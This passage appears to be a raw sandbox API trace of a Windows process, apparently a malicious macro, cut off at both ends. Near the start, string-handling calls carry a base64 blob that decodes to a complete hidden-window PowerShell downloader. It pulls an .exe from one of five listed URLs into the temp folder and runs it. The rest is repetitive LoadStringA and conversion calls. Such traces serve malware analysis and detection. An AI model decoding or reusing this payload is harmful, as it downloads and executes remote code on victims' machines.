cchWideChar=728, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 728 [0061.276] SysStringLen (param_1="cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9jYXJiZXlvbmRzdG9yZS5jb20vY2lhbnJmdC8saHR0cDovL3B4cGdyYXBoaWNzLmNvbS9lc3B6eXVydC8saHR0cDovL25vbmlldXJvLmNvbS94YXVxdC8saHR0cDovL3N0dWRpb2dpZi5jb20uYnIvamVkdHZ1emlreS8saHR0cDovL21vdG9yZ2lybHN0di5jb20va2RtLycuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319") returned 0x2d8 [0061.276] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9jYXJiZXlvbmRzdG9yZS5jb20vY2lhbnJmdC8saHR0cDovL3B4cGdyYXBoaWNzLmNvbS9lc3B6eXVydC8saHR0cDovL25vbmlldXJvLmNvbS94YXVxdC8saHR0cDovL3N0dWRpb2dpZi5jb20uYnIvamVkdHZ1emlreS8saHR0cDovL21vdG9yZ2lybHN0di5jb20va2RtLycuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319", cchWideChar=729, lpMultiByteStr=0x88b846c, cbMultiByte=729, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9jYXJiZXlvbmRzdG9yZS5jb20vY2lhbnJmdC8saHR0cDovL3B4cGdyYXBoaWNzLmNvbS9lc3B6eXVydC8saHR0cDovL25vbmlldXJvLmNvbS94YXVxdC8saHR0cDovL3N0dWRpb2dpZi5jb20uYnIvamVkdHZ1emlreS8saHR0cDovL21vdG9yZ2lybHN0di5jb20va2RtLycuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319", lpUsedDefaultChar=0x0) returned 729 [0061.279] GetAsyncKeyState (vKey=3) returned 0 [0061.279] VarCmp (pvarLeft=0x341560, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.279] VarCmp (pvarLeft=0x341560, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.279] VarCmp (pvarLeft=0x341560, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.279] VarCmp (pvarLeft=0x341520, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.280] VarBstrCat (in: bstrLeft="", bstrRight="-27531", pbstrResult=0x33f3dc | out: pbstrResult=0x33f3dc) returned 0x0 [0061.280] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.280] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.281] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.281] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.282] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.282] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.282] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.283] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.283] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.284] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.285] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.285] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.285] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.285] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.285] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.285] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.286] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.286] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.286] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.286] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.286] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.286] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.287] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.287] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.287] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.287] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.287] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.287] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.288] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.288] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.288] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.288] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.288] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.288] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.289] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.290] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.290] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.290] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.290] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.290] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.291] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.291] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.291] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.291] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.291] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.291] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.292] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.293] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.293] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.293] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.293] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.293] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.293] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.294] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.294] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.294] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.294] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.294] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.294] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.295] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.296] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.296] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.296] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.296] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.296] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.296] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.297] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.297] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.297] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.297] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.297] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.297] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.298] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.298] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.298] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.298] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.298] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.298] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.299] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.299] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.299] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.299] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.299] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.299] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.300] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.301] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.301] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.301] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.301] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.301] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.301] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.302] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.302] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.302] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.302] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.302] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.302] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.303] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.303] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.303] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.303] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.303] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.303] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.304] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.305] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.305] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.305] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.305] LoadStringA (in: 